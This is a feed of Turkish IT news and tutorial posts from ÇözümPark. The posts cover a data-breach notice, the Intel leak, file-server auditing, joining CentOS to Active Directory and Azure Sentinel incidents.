Haberin başlığındaki soruyu cevaplandıracak olursak. Bugünün perspektifi ile şöyle üstünkörü bir sıralama yapabiliriz; En çok kazananlar 5G teknolojisini kullanacak olan işletmeler olacak. İşletmeleri, bulut servis sağlayıcıları takip ederken, 5G’yi geliştiren telekomünikasyon firmaları ise listenin alt sıralarında yer alacak gibi görünüyor.

Kaynak

The post 5G’den En Fazla Kim Faydalanacak? appeared first on ÇözümPark.

BM, Pandemi Sırasında Siber Saldırılarda Keskin Bir Artış Yaşandığını Bildirdi

$
0
0

BM Terörle Mücadele Şefi perşembe günü yaptığı açıklamada, yılın ilk çeyreğinde kimlik avı web sitelerinde yüzde 350′ lik bir artış olduğunu bildirildi. Saldırıların çoğu hastaneleri ve sağlık sistemlerini hedef aldı, özellikle COVID-19 salgınına yanıt verme çalışmalarını engelledi.

Voronkov “Teröristlerin COVID-19’un neden olduğu önemli yıkımı ve ekonomik zorlukları korku, nefret ve bölünmeyi yaymak, radikalleştirmek , yeni takipçiler edinmek için kullandığını biliyoruz. Pandemi sırasında İnternet kullanımındaki ve siber suçlardaki artış, sorunu daha da karmaşık hale getiriyor”dedi.

Hafta boyu süren toplantıya 134 ülke, 88 sivil toplum örgütü ve özel sektör kuruluşu, 47 uluslararası ve bölgesel kuruluş ,son olarak 40 BM temsilcisi katıldı.

Ayrıca Waly, kapsamlı ve işbirliğine dayalı yanıtlara her zamankinden daha fazla ihtiyaç olduğuna değindi.

Kaynak

The post BM, Pandemi Sırasında Siber Saldırılarda Keskin Bir Artış Yaşandığını Bildirdi appeared first on ÇözümPark.

File Server Yönetiminde Farklı Perspektiflerden Görünürlük Nasıl sağlanır?

$
0
0

BT birimleri kurumun teknoloji ihtiyaçları için çok sayıda sistem kurması gerekir. Kurulan her sistem belirli ihtiyaçları karışılarken yanında yönetilmesi gereken bir iş yükünü de beraberinde getirir. Günümüzde her kurumda kullanıcılar tarafından en çok kullanılan servis dosya paylaşım sunucularıdır. Dosya paylaşım sunucuları kurulumu kolay fakat yönetimi zordur. Bu zorluk zaman içerisinde kullanıcılar tarafından oluşturulan klasörlerin, dosyaların ve erişimlerin sayısı artıkça sistemde güvenlik ve yönetim karmaşası oluşur.  Windows tarafından yönetilen bir dosya paylaşım alanında görünürlük bir süre sonra kaybolur.

Bu durum güvenlik ve yönetim risklerini de beraberinde getirir. Folsec dosya paylaşım sunucularında görünürlük ve yönetim kolaylığı sağlamak için BT yöneticisine 4 perspektif sunar. Gelin dosya sunucusunda ki 4 riski tespit edelim ve Folsec’in çözüm mimarisine bakalım.

  Riskler.

1.    File server alanındaki permissionların raporlama ve yönetim zorluğu.

2.    File server permission taleplerinin yönetilememesi.

3.    File server alanında ki erişimlerin anlamlı şekilde raporlanamaması.

4.    File server alanı nasıl kullanılıyor? Ne tür dosya tipleri var analiz edilemiyor.

  Folsec ile  4 Perspektif

1.    Permission Perspektif

2.    Folder Request Perspektif

3.    File Audit Perspektif

4.    File Type Perspektif

1.  Permission Perspektif

Dashbord:

Folsec file server üzerindeki permissionları belirli periyotlarda tarayarak  hangi klasörde kimin veya gurubun ne tür hakkı olduğunu tespit eder. (Tarama için agent kurulmaz) Özellikle everyone gurubu Permission Perspektif Dashbordunda merkeze alınmış ve Folsec üzerinden everyone grubu bir klasöre tanımlanır ise otomatik e-posta göndermesi sağlanabilir.

 MenüServer perspektif ( ntfs permission reporter and management)

Tarama sonrası permissionları raporlamak ve yönetmek çok kolaydır.  Server perspektif alanında yapılabilecekler.

  • Hangi klasörde kimin ne tür hakkı var o anki durumunu raporlayabilirsiniz.
  • Kullanıcı ve grup haklarını yönetebilirsiniz. (AD kullanıcı ve gruplarını Ekleme – Silme – Düzenleme)
  • Bir kullanıcıya belirli bir süre için permission verilebilir. ( \\finans klasörüne Hakan bey için Bugün saat 14:00’da  read hakkı ver. Akşam 18:00’da permission’ı geri kaldır. İşlemler bitince  E-posta ile geri bildirim yapılabilir.
  •  \\Finans klasöründeki kullanıcı haklarını export edebilir veya e-posta ile gönderebilirsiniz.
  • Inherit raporunu alabilir ve değişiklik yapabilirsiniz.  Tüm klasörlerin inherit ayarlarını topluca enable edebilirsiniz.
  • Klasörlerin owner’ını görebilir ve değiştirebilirsiniz.
  • Bir klasöre izin verirken alt klasörlerde inherit kapalı olsa bile mevcut permissionları bozmadan permission değişikliği yapılabilir.
  •  Bir klasörün permission yönetimini sadece bir kişiye verebilirsiniz. 
  • Bir klasördeki tüm permission değişikliklerini belirlenen kullanıcılara e-posta ile raporlayabilirsiniz.

Menü: User Perspektif

Bir user’ın hangi server üzerinden hangi klasörlerde ne tür permissionları var raporlayıp yönetebilirsiniz.

  • Bir user’ın tüm haklarını topluca değiştirebilirsiniz. \\finans klasöründe ismail Bey’in full permissionlarını read olarak değiştirebilirsiniz.
  • Hakan Bey’in tüm haklarını Mehmet bey ’ede klonlayın.
  • Okan Bey’in tüm haklarını Serhat Bey’e taşıyın.
  • Taylan Bey’in tüm haklarını seçilen server üzerinde remove edin.
  • Everyone grubunun tüm haklarının raporunu export edin veya e-posta ile gönderin.

Menü: Event Perspektif

Folsec permission tarama sonuçları ve folsec panel kullanılarak yapılan değişikliklerin analiz edildiği ekrandır.

  •  Sistem tarama sonucunda hangi klasörlerde hangi permissionlar tespit edildi.
  • Tarama sonrası top 5 permission sahibi tespit edilebilir.
  • Folsec panel üzerinden en çok kim hangi değişiklikleri hangi klasörde ne zaman yaptı raporlanabilir.

Menü: Permission Restore

Kullanıcılar tarafından yapılan permission değişikliklerini geri alabilirsiniz.

Menü Raporlar:

 User Permission Report ( Bir sunucu üzerinde en çok hangi kullanıcının permissionları var ve türü ne dir?  Serhat Bey’in 1500 klasörde full hakkı var)

Schedule Permission Reporter ( Belirtilen saatte permission uygular)

 Periodical Permission Report (  Süresi biten permission’ı otomatik kaldırılır.)

2.  Folder Request Perspektif

  Kullanıcılar seçtikleri klasör için süreli veya süresiz permission isteğinde bulunabilir.  \\Projeler\  klasörüne 3 saat’lik izin talebinde bulunulabilir. Süre bitiminde izin kaldırılır.

Kullanıcıların folsec üzerinden klasör izin taleplerinin yönetildiği modül. Kim ne zaman hangi klasör için ne kadar süre izin talep etmiş kim onaylamış kim reddetmiş raporlanabilir.

  • Bir klasörün permission yönetimi bir kullanıcıya verilebilir ve permission talepleri bu kullanıcı tarafından yönetilebilir.
  • Kullanıcıların permission istekleri klasörü yöneten yetkilinin e-posta adresine gelen linke tıklayarak onaylanabilir veya reddedilebilir.
  •  Yapılan tüm permission istekleri ve sonuçları raporlanabilir.

3.  File Audit Perspektif

           Windows file audit loglarının analiz edildiği dashboard. VMI üzerinden security logları çekilip analiz edilir. Agent kurulmaz. 

  •  File server üzerinde okuma, oluşturma, silme, düzenleme,vs işlemlerinin kim tarafından ne zaman yapıldığını.
  •  Windows üzerinden yapılan permission değişiklikleri analiz edilebilir.
  • Klasör ’ün owner değişikliği kimin yaptığı tespit edilebilir.
  • Seçilen tarih aralığında en fazla silinen, oluşturulan ve okunan dosya tipleri neler?
  • Seçilen tarih aralığında top 5 okuma, silme, oluşturma, rename etme vs işlemleri analiz edilebilir.
  • Başarısız Silme ve okuma girişimleri raporlanabilir.
  • En son hangi path üzerinde okuma, silme, oluşturma vs işlemlerinin yapıldığı raporlanabilir.
  • En son Windows event ne zaman kim tarafından silindi raporlanabilir.

4.  File Type Perspektif

File server üzerindeki dosya tiplerinin analiz edilmesini sağlar.

  • Sunucu üzerinde hangi formatta kaç adet dosya var bilinebilir.   .doc uzantılı 500 dosya var toplam 4.6GB path bilgisi ve owner’ı ile birlikte.
  • Dosya tiplerinin hangi kategoride olduğu tespit edilebilir. Executable kategorisinde 200 dosya var 5GB
  • Hangi kullanıcının hangi kategoride kaç dosyası var boyutları neler raporlanabilir.
  • En son oluşturulan dosyalar hangileri.
  • En eski dosya uzantısı nedir?
  • Örneğin 10MB’dan büyük dosyaları listeye bilirsiniz.
  • Örneğin seçilen tarihten önce veya sonra oluşturulan dosya tiplerini raporlayabilirsiniz.
  • Boyutu en fazla olan klasörleri raporlayabilirsiniz. İçerisinde kaç alt folder olduğunu ve dosya tiplerini analiz edebilirsiniz.
  • Klasör oluşturma silme ve düzenleme işlemlerini web ara yüzünden yapabilirsiniz.

Folsec sisteme kurulduktan sonra dosya paylaşım alanındaki 4 riskin de yönetilebilir ve raporlanabilir hale geldiğini göreceksiniz. Folsec yerli sermaye ve insan kaynağı ile geliştirilmiş dosya paylaşım sunucusu üzerindeki riskleri minimize etmek yönetimi kolaylaştırmak ve KVKK süreçlerine destek olmak için geliştirilmiş web tabanlı yazılımdır.  

Teşekkürler.

https://folsec.com

info@folsec.com

The post File Server Yönetiminde Farklı Perspektiflerden Görünürlük Nasıl sağlanır? appeared first on ÇözümPark.

Kamuoyu Duyurusu (Veri İhlali Bildirimi) – Penti Giyim Sanayi ve Ticaret Anonim Şirketi ve İştirakleri

$
0
0

Kamuoyu Duyurusu (Veri İhlali Bildirimi) – Penti Giyim Sanayi ve Ticaret Anonim Şirketi ve İştirakleri

Bilindiği üzere, 6698 sayılı Kişisel Verilerin Korunması Kanununun “Veri güvenliğine ilişkin yükümlülükler” başlıklı 12 nci maddesinin (5) numaralı fıkrası “İşlenen kişisel verilerin kanuni olmayan yollarla başkaları tarafından elde edilmesi hâlinde, veri sorumlusu bu durumu en kısa sürede ilgilisine ve Kurula bildirir. Kurul, gerekmesi hâlinde bu durumu, kendi internet sitesinde ya da uygun göreceği başka bir yöntemle ilan edebilir.” hükmünü amirdir.

Veri sorumlusu sıfatını haiz olan Penti Giyim Sanayi ve Ticaret Anonim Şirketi (Türkiye) ve iştirakleri olan Penti Çorap Sanayi ve Ticaret Anonim Şirketi (Türkiye), SC Penti World SRL (Romanya), Penti World LLC (Kazakistan) ve Penti Giyim Ticaret Anonim Şirketi (Kuzey Kıbrıs Türk Cumhuriyeti) tarafından Kurumumuza gönderilen yazılarda özetle;

  • İhlalin; Penti Giyim Sanayi ve Ticaret Anonim Şirketinin sistemlerine yapılan fidye saldırısı neticesinde gerçekleştiği,
  • İhlalin 31.07.2020 tarihinde gerçekleştiği ve aynı tarihte tespit edildiği,
  • İhlal sonucunda; Penti Giyim Sanayi ve Ticaret Anonim Şirketinin tahmini 650 kullanıcısına ait kimlik ve iletişim verilerinin, Penti Çorap Sanayi ve Ticaret Anonim Şirketinin tahmini 130 kullanıcısına ait kimlik ve iletişim verilerinin, SC Penti World SRL’nin tahmini 45.228 çalışan, müşteri ve potansiyel müşterilerine ait kimlik, iletişim ve müşteri işlem verilerinin, Penti World LLC’nin tahmini 14 çalışanına ait kimlik ve iletişim verilerinin, Penti Giyim Ticaret Anonim Şirketinin tahmini 4 kullanıcısına ait kimlik, iletişim ve müşteri işlem verilerinin etkilendiği,
  • İncelemelerin devam ettiği ihlalden etkilenen kişi sayısının henüz tespit edilemediği,
  • İhlal hakkında incelemenin Penti Giyim Sanayi ve Ticaret Anonim Şirketi nezdinde devam ettiği,

ifade edilmiştir.

Konuya ilişkin inceleme devam etmekle birlikte, Kişisel Verileri Koruma Kurulunun 06.08.2020 tarih ve 2020/600-601-602-603-604 sayılı Kararları ile söz konusu veri ihlali bildirimlerinin Kurumun internet sayfasında ilan edilmesine karar verilmiştir.

Kamuoyuna saygıyla duyurulur.

Kaynak

The post Kamuoyu Duyurusu (Veri İhlali Bildirimi) – Penti Giyim Sanayi ve Ticaret Anonim Şirketi ve İştirakleri appeared first on ÇözümPark.

ASELSAN Siber Güvenlik Birimi göreve başladı

$
0
0

T.C. Cumhurbaşkanlığı tarafından yayınlanan 2019/12 sayılı Bilgi ve İletişim Güvenliği, Bilgi ve İletişim Güvenliği Rehberi, Türk Silahlı Kuvvetleri Yönergeleri, NATO Cyber Defence Policy ve ENISA Cyber Security gibi milli ve uluslararası genelgelerin ışığında, ASELSAN Siber Güvenlik Birimi kuruldu. Birimle birlikte sistemlerde güvenliğinin sağlanması, yüksek güvenliğin standart haline gelmesi ve siber olgunluk seviyesinin yüksek tutulması amaçlanıyor.

6 Şubat 2020 tarihinde yapılan  ASELSAN Sistemleri ve Yetenek Paketleri Siber Tehdit Durum Değerlendirmesi sunumuyla birlikte, ASELSAN’ın geliştirdiği sistemlerin siber güvenlik tarafında durumu gündeme geldi.

Daha sonra ASELSAN yönetimi tarafından alınan kararla ASELSAN Siber Güvenlik Birimi (ASGB), daha önce kurulmuş olan Haberleşme ve Bilgi Teknolojileri (HBT) Kripto ve Bilgi Teknolojileri Program Direktörlüğü altında göreve başladı. Yeni birim, ASELSAN tarafından geliştirilen sistemlerin siber güvenlik açısından belli şartları taşıyıp taşımadığını inceleyecek.

Sistemlerin tasarımında, geliştirilmesinde, test aşamasında ve yönetilmesinde Siber Güvenlik Mühendisliği kimliğiyle faaliyetlerde bulunacak. Ayrıca sektör başkanlıkları altında siber güvenlik faaliyetlerini koordine edecek ve yönetecek.

ASGB, ilk olarak sektör başkanlıkları tarafından belirlenen temsilcilerden oluşacak. Sürecin tamamlanmasının ardından, ASELSAN siber olgunluk seviyesi, The Systems Security Engineering Capability Model(SSE-CMM) göre seviye 1 olacak. ASGB faaliyetleriyle birlikte bu seviyenin aşamalarla 5’e kadar yükseltilmesi amaçlanıyor.

Bununla birlikte ASGB tarafından tehdit modelleri oluşturulacak, güvenli yazılım geliştirme kültürü kurulacak ve yaygınlaştırılması sağlanacak. Sistem güvenlik testleri de yapılırken, ASELSAN bünyesinde siber güvenlik kültürünün oluşması ve uzman insan kaynağının kuruma kazandırılması amaçlanıyor.

Kaynak: https://www.savunmatr.com/siber-guvenlik/aselsan-siber-guvenlik-birimi-goreve-basladi-h1461.html

The post ASELSAN Siber Güvenlik Birimi göreve başladı appeared first on ÇözümPark.

Centos 7 / Rhel 7 Sunucularını Active Directory Etki Alanına Katma

$
0
0

Merhaba arkadaşlar bu makalem de Linux Dağıtımlarından biri olan Centos 7 sunucunu Windows AD sunucusuna dahil edeceğiz.Yani Centos7 ‘ yi domain ‘ e ekleyeceğiz.Önceki makalemde ise sizlere yine samba ile dosya paylaşımını bu linkte https://www.cozumpark.com/centos8-samba-kurulumu-ve-dosya-paylasimi/ anlatmıştım.Samba 4.0 versiyonundan sonra Active Directory (AD) ve Domain Controller (DC) kurulumunu desteklemeye başlamıştır. .Bir ağ üzerindeki bilgisayarların merkezi olarak yönetilmesi, çeşitli izinlerin kısıtlamaların, hakların merkezi olarak  verilmesi, kullanıcıların ağ üzerindeki herhangi bir bilgisayar üzerinde kendi kullanıcı adı ve şifresi ile oturum açtığında kendi masaüstü ve dosyalarını karşısında bulabilmesi şeklinde ve hakkında bilmediğim çeşitli imkanlar sunan Active Directory veya windows sistemlerde bir çalışma grubu yerine bir domain (hakimiyet alanı) üzerinde oturum açma konusu winserver kullanımı gerektiriyor. Açık kaynak kod – linux dünyasında win ağları için bahsettiğim konuda bir sunucu uygulaması araştırdığımda,karşıma samba4 çıktı.Ben de samba ile tanıştıktan sonra samba ile neler yapılır tespit ettikten sonra samba ile ilgili sizlere makale yazmaya karar verdim.

AD DC olarak Samba yalnızca şunları destekler:

  • LDAP ile AD backend kısmı entegrasyonu. Ayrıntılar için SSS kısmına bakabilirsiniz.  Does Samba AD DCs Support OpenLDAP or Other LDAP Servers as Back End?
  • Heimdal Kerberos Key Distribution Center (KDC).
  • Samba, Samba 4.7 veya üstünü çalıştırırsanız ve –with-system-mitkrb5 seçeneği kullanılarak oluşturulmuşsa, işletim sisteminiz tarafından sağlanan MIT Kerberos KDC için deneysel destek sağlar. Diğer durumlarda Samba, Samba’da bulunan Heimdal KDC’yi kullanır. MIT KDC’yi kullanan Samba ve neden deneysel olduğu hakkında daha fazla ayrıntı için bkz.  Running a Samba AD DC with MIT Kerberos KDC.

Kuruluma başlamadan önce kendime test ortamı ayarladım.Bunlar aşağıdaki gibidir:

1-) 1 Adet Windows Domain Controller sunucusu (IP=192.168.1.110 Hostname=SERVER2016)
2-) 1 Adet Centos7 sunucusu(IP=192.168.1.100 Hostname=cozumpark)

Kuruluma geçmeden önce Windows AD sunucusunun ve Centos7 sunucusunun birbirleri ile haberleşmesi için gerekli network ayarlarını yapmamız gerekmektedir.İlk önce Windows AD sunucusunun Network ayarlarına bakıyoruz ve bir sonraki işlemde de Centos 7 sunucusuna erişip erişmediğini kontrol edeceğiz.

Windows AD Network Ayarları

Diğer bir aşama da AD sunucusunun Centos 7 sunucusuna erişimini kontrol edeceğiz.

AD Sunucusunun Centos Sunucusuna Erişimi

Centos sunucuda da aynı kontrolleri yapmamız gerekiyor.

Centos 7 Network Ayarları

İki sunucunun erişimini kontrol ediyoruz.

Centos 7 Sunucusunun AD ‘ ye Erişimi

İki sunucuda da Network ayarlarını ve erişimleri kontrol ettikten sonra diğer bir aşama olan domain’e ekleyeceğimiz olan Centos sunucusunda hosts dosyasında ve resolv.conf dosyalarında AD sunucusunun IP ve Hostname girilmesi gerekiyor.Bu değişkenler girildikten sonra Centos sunucusunu eklediğimizde değişkenleri otomatik çekecektir.

/etc/hosts
/etc/resolv.conf

Her iki sunucuda da gerekli ayarları yaptıktan sonra Centos sunucu üzerinde gerekli paketlerin kurulumuna başlayabiliriz.

Gerekli Paketlerin Kurulumu

1-) yum install oddjob realmd samba samba-common oddjob-mkhomedir sssd adcli
2-) yum install sssd-tools
3-) yum install system-config-date ntp authconfig-gtk authconfig
4-) systemctl restart ntpd
5-) systemctl enable ntpd

Yukarıdaki komutları komut satırında çalıştırdıktan sonra komut satırında authconfig-gtk çalıştırarak config ekranını açabiliriz.Configure ekranında ki terimleri açıklayalım.

  • User Account Database = seçili olacak
  • Winbind Domain = YOUR_DOMAIN
  • Security Model = ADS
  • Winbind ADS Realm =Domain Controller
  • Domain Controllers = Domain Controller Name
  • Template Shell = /bin/bash
  • Allow offline login = seçili olacak
Winbind Ayarları

 Gerekli tüm değerleri ekledikten sonra, Kimlik ve Kimlik Doğrulama sekmesine dönün ve   Ayarları kaydetmek  için Etki Alanına Katıl düğmesine ve uyarı penceresinden Kaydet düğmesine tıklayın .

Sistemin Samba4 AD DC’ye katılıp katılmadığını doğrulamak için , RSAT araçları yüklü bir Windows makinesinden AD Kullanıcıları ve Bilgisayarlarını açın ve etki alanınız Bilgisayarlar konteynerine gidin.

CentOS makinenizin adı doğru düzlemde listelenmelidir.

Bir Samba4 AD DC Hesabı ile CentOS Masaüstüne Giriş Yapın

CentOS Desktop’a giriş yapmak için eğer login ekranınız da açmak istediğiniz user yok ise Not User List seçeneğini seçerek user ve password’ü girerek login olabilirsiniz.Bu oturum da temel de iki yöntem ile açılabilir açılış yöntemleri aşağıda yer almaktadır.

Domain\domain_account
or
Domain_user@domain.tld

Etki alanındaki bir kullanıcıyla ilgili bilgileri görüntülemek için aşağıdaki komutu çalıştırın:

 Yalnızca bir Active Directory grubunun oturum açmasına izin vermek için aşağıdaki komutu kullanın: Bu Örnekte Administrator kullanıcısının sistemde oturum açmasına izin vereceğiz.

 bir Active Directory grubuna izinleri bu örnekte biz visudo komutunu çalıştırarak sudoers için Administrator AD grubu eklemek ve follwoing çizgi katacak:

 Bir Active Directory alanından ayrılmak için aşağıdaki komutu kullanabilirsiniz:

Etki alanından ayrılmak ve bilgisayar Hesabını silmek istiyorsanız --remove, komutun sonundaki ek seçeneği kullanabilirsiniz.

Sonuç

Bu eğitimde, sambayı CentOS ve Redhat üzerindeki aktif dizine nasıl entegre edeceğimizi öğrendik. Umarım okumaktan zevk almışsınızdır ve lütfen önerinizi aşağıdaki yorum bölümünde bırakın.

The post Centos 7 / Rhel 7 Sunucularını Active Directory Etki Alanına Katma appeared first on ÇözümPark.


Iphone 12 ‘de Yeni Neler Var? Satış Tarihi Ertelenecek Mi

$
0
0

Apple’ın sonraki modeli olan Iphone 12, lansman sonrası Ekim ayında satışa sunulacağı söylenirken, bu tarihin uzayabileceğini tahmin ediyor.

Iphone 12 satış tarihi merakla bekleniyor. Görsel: PhoneArea

Geliştiriciler için yayınlan iOS 14 beta sürümü ile birlikte, yeni versiyonda neler yapabileceği hakkında birçok bilgi beraberinde ortaya çıktığını söyleyebiliriz. Oyuncuların daha da güçlendiği rekabet ortamında, resmi olarak ismi açıklanmayan iPhone 12, 12 Pro ve 12 Max için daha iyi bir performans sunan yazılım ve donanım ile karşımıza çıkabilir.

Yeni model için satış tarihi ertelenebilir

Her yıl Eylül ayında genellikle yeni cihaz ve yazılımlarını tanıtan Apple, koronavirüs nedeniyle yeni cihazını piyasaya sürmekte zorlanabilir. Bildiğiniz üzere, COVID-19 pandemisi sebebiyle, tüm perakende mağazalarını geçici süreyle kapatmak zorunda kalan Apple, kademeli olarak bazı mağazalarını tekrar açmış olsa da Çin’deki tedarikçilerinde pandemi sebebiyle kapanması veya sınırlı kapasiteyle çalışması üretimi olumsuz etkiledi aşikar.

Tahmin edilen gecikme resmi olarak bilinmese de beklenen bu durum karşısında bazı dedikolar mevcut. Apple’ın yeni amiral gemisine rekabet edebilecek bir özelliği ekleyeceği spekülasyonlar arasında: 5G. Samsung’un geçtiğimiz günlerde tanıttığı Note 20, Note 20 Ultra ve Galaxy S20 telefonlarının sahip olduğu 5G teknolojisiyle rekabette bir adım önde tuttuğunu söylemek mümkün.

Iphone 12 Pro Konspet tasarım

Iphone 12 İçin Beklenenler

Tamamen güvenilen tahminler doğrultusunda şunları söylemek mümkün: Üç farklı ekran boyutuyla dört farklı iPhone 12 modeli olabilir. 12 modeli için 5,4 inç, 6,1 inç, Pro modelleri için 6,1 inç ve 6,7 inç ekran boyutları ile gelebilir. Kutu içerisinden süpriz olarak kulaklık veya güç adaptörü olmayacağı söylentiler arasında. Ayrıca koyu mavi yeni rengi sızan görüntüler arasında. Yukarıda bahsettiğimiz gibi 5G teknolojisiyle piyasaya sürülebilir. Son olarak arka kameralarında 3D derinlik algılama teknolojisi olduğu tahmin ediliyor.

Tamamen güvenilen tahminler doğrultusunda şunları söylemek mümkün: Üç farklı ekran boyutuyla dört farklı iPhone 12 modeli olabilir. 12 modeli için 5,4 inç, 6,1 inç, Pro modelleri için 6,1 inç ve 6,7 inç ekran boyutları ile gelebilir. Kutu içerisinden süpriz olarak kulaklık veya güç adaptörü olmayacağı söylentiler arasında. Ayrıca koyu mavi yeni rengi sızan görüntüler arasında. Yukarıda bahsettiğimiz gibi 5G teknolojisiyle piyasaya sürülebilir. Son olarak arka kameralarında 3D derinlik algılama teknolojisi olduğu tahmin ediliyor. Yeni modelin başlangıç fiyatı ise 699 dolardan çıkması bekleniyor.

MacRumors, Apple’ın 2020 modelleri için kademeli olarak piyasaya süreceğini öne sürüyor. Salgın sebebiyle tedarik zincirinin sekteye uğraması nedeniyle, ilk olarak iki 6,1 inç iPhone modeli piyasaya sürülebilir.

Kaynak

The post Iphone 12 ‘de Yeni Neler Var? Satış Tarihi Ertelenecek Mi appeared first on ÇözümPark.

Microsoft, En Son Yayınlanan Windows 10 Sürümündeki İnternet Yok Hatasını Düzeltti

$
0
0

Microsoft, Geliştirme kanalında Windows Insider’lar için hazırlanan Windows 10 Build 20185 sürümü ile Windows 10 2004 sürümünü kullanan cihazlardaki “İnternet Erişimi Yok” sorununu düzeltti.

Microsoft ayrıca, Windows 10 kullanan müşterilerinin artık Windows 10 Insider Preview 20185’i yükledikten sonra HTTPS üzerinden DNS (DOH) yapılandırması yapabileceğini bildirdi.

Microsoft, bilinen sorunun Windows 10 Build 20185 sürümünü yükleyen Windows 10 Insider kullanıcıları için düzeltildiğini belirtti. Normal kullanıcıların bu sorunu çözmesi için Microsoft’un destek sayfasındaki diğer çözümlere başvurması gerekecek.

Kaynak

The post Microsoft, En Son Yayınlanan Windows 10 Sürümündeki İnternet Yok Hatasını Düzeltti appeared first on ÇözümPark.

Intel Veri Sızıntısı: 20 GB Kaynak Kodu Ve İddia Edilen İhlallere İlişkin Dahili Belgeler

$
0
0

Bir ihlalden kaynaklandığı iddia edilen ABD’li yonga üreticisi Intel’ in sınıflandırılmış ve gizli belgeleri, bugün erken saatlerde halka açık bir dosya paylaşım hizmetine yüklendi.

Gizli belgelerin kapasitesinin 20 GB olduğu ve kaynağının belli olmadığı belirtildi.

Belgeleri anonim bir bilgisayar korsanından alan, bir geliştirici ve tersine mühendis olan Tillie Kottmann’a  göre, bilgilerin çoğunun fikri mülkiyet olarak korunması gerekiyor.

Ürün yazılımı kaynak koduna göz atanlar, arka kapılara atıfta bulunan yorumları bulacaklardır, ancak bu herhangi bir anlama gelebilir ve kesinlikle bilgisayarınıza erişebilecekleri anlamına gelmez.

Bilgisayar korsanı, özel bir Python komut dosyası kullanarak varsayılan kullanıcı adı erişimini , dosyalara ve klasörlere güvenli olmayan erişimi test edebildiklerini iddia ediyor. Bilgisayar korsanına göre, doğru isimleri biliyorsanız klasörlere erişim mümkündür. Yine de tek bir ismi tahmin etmeleri gerekiyordu. İçeri girdikten sonra, kök dizine geri dönebilir ve bunlardan herhangi birine erişebilir.

INTEL’ DEN AÇIKLAMA

“Bu durumu araştırıyoruz. Bilgiler, müşterilerimiz, ortaklarımız ve erişim için kayıt yaptıran diğer harici taraflarca kullanılmak üzere bilgileri barındıran Intel Kaynak ve Tasarım Merkezi’nden geliyor gibi görünüyor. Erişimi olan bir kişinin bu verileri indirip paylaştığına inanıyoruz” dedi.

Görünenlere göre devamı gelecek gibi duruyor…

Kaynak

The post Intel Veri Sızıntısı: 20 GB Kaynak Kodu Ve İddia Edilen İhlallere İlişkin Dahili Belgeler appeared first on ÇözümPark.

Azure Sentinel Adım Adım Bulut SIEM Kullanımı – Bölüm8 – Incidents

$
0
0

Makalemin bundan önceki bölümlerinden özellikle Microsoft sistemleri başta olmak üzere Sentinel için pek çok veri kaynağından nasıl logları toplayabileceğimizi anlatmıştım. Bu bölümde ise topladığımız bu verilerden anlamlı olayları nasıl oluşturabileceğimizi göreceğiz. Öncelikle bu konuda çok kafa karıştıran bir soru ile başlamak istiyorum. Alert ile Incident farkı nedir? Temel fark aslında Incident yani olay, bir den çok alert yani uyarı grubunun bir arada kullanıldığı ve aksiyon almanız gereken, çözmeniz ve araştırmanız gereken olaylara verilen isimdir. Ya da sözlük tabiri ile

Olaylar, birlikte araştırabileceğiniz ve çözebileceğiniz, eyleme geçirilebilir olası bir tehdit oluşturan ilgili uyarı gruplarıdır.

https://sozluk.cozumpark.com/azure-sentinel-incidents

Benim bizzat başıma gelen bir olayı paylaşarak örneklemek istiyorum;

Personel şirkete fiziksel olarak gelmiyor, kapı geçiş sisteminde kart okutması yok, vpn loglarında vpn yaptığına dair bir log yok anca local logon event id ile bir logon işlemi yakalanıyor, bu uyarı hızlıca bir olaya dönüştürülmeli çünkü anormal bir durum var.

Peki incident yani olay nasıl oluşur?

Öncelikle bunun temelde birkaç yöntem vardır. Birincisi Microsoft tarafından varsayılan olarak bize sunulan ve makalemin bir önceki bölümünde paylaştığım analytic kurallarının aktif edilmesi ile otomatik olarak oluşturulabilir.

İsterseniz otomatik gelen analitik kurallarını hızlıca hatırlayalım

Yukarıda görebileceğiniz gibi aktif 5 kuraldan 4 tanesi otomatik olarak sunulmaktadır. Bir önceki makalemde detay paylaşmıştım ve yine bir önceki makalemde anlattığım gibi isterseniz buraya sizde elle yeni kurallar ekleyebilirsiniz. Ben önek Event ID 4625 kuralını ekledim. Tabi ki bu kurallardan daha çok fazla sayıda var, tek yapmanız gereken aktifleştirmek.

Bir diğer yöntem ise Microsoft Cloud App Security, Azure Advanced Threat Protection ve benzeri Microsoft’ un güvenlik ürün çözümlerini Sentinel’ e bağlayarak onlardan gelen uyarıların otomatik olay oluşturmasını sağlayabilirsiniz. Varsayılan olarak bu güvenlik ürünlerinden gelen uyarılar bir olay oluşturmaz. Sentinel bu verileri Security Alert Table içerisinde saklar.

https://www.hakanuzuner.com/azure-sentinel-table

Yani bu güvenlik servisleri tarafından oluşturulan Alert – Uyarılar sentinel veri tabanında RAW veri olarak saklanır.

Eğer isterseniz her bir uyarı sonucunda bir olay oluşturulmasını sağlayabilirsiniz. Hatırlarsanız bir önceki makalemde analitik bölümünde elle kural eklemeyi göstermiştim ama bu diğer yöntemden bahsetmemiştim, isterseniz şimdi hızlıca o bölüme de değinelim.

Azure Sentinel üzerinde “Analytics” bölümüne gelelim, daha sonra “Rule templates” linkine tıklayalım. Burada varsayılan olarak tanımlanmış analitik kurallarını göreceksiniz.

Type bölümünde “Microsoft Security” yazan ve kullanmak istediğiniz herhangi bir kuralı seçin;

Daha sonra sağ bölümden Create Rule butonuna basın.

Örneğin ben Azure Security Center kuralını seçtim, bu bölümde mutlaka anlamlı bir açıklama tanımı, durumu, iş ihtiyacını için gerekli olan öncelik seçimi (yüksek, orta, düşük ve bilgi) ve bir olay oluşması için aslında başka bir alert gerekli ise onu tanımlamanız önemlidir.

Bir diğer yöntem ise connector üzerinden bu ayarı yapmaktır.

Bu sayede ilgili connector üzerinden toplanan loglar ile beraber olay tanımları otomatik yapılacaktır.

Peki olayların temelde hangi kaynaklardaki verilerden oluştuğunu gördüysek şimdi bir tane olay incelemesi yapalım.

Demo ortamı olduğu için mükemmel olaylar oluşturamadım ama en azından internete açık bir windows server’ ın tüm olay günlüklerini topladım ve sonra başarısız logon denemeleri olur ise bunu bana olay olarak ata dedim, bu kuralı nasıl yazdığımı merak ediyorsanız bir önceki makalemi inceleyebilirsiniz.

Tabi ki her olay ne yazık ki görsel olarak takip edilemeyebiliyor, özellikle bunun olması için sağ bölümde gördüğünüz gibi bir takım temel bilgilerin olması şart.

Örnek burada ip adresimiz veya url gibi bilgiler ne yazık ki yok.

Hemen altındaki view full details linkine tıklayalım.

Daha sonra AlertID ye tıklayalım

Burada ilgili olay hakkında detay görebiliyoruz.

Umarım faydalı bir yazı olmuştur, bir sonraki paylaşımımda görüşmek üzere.

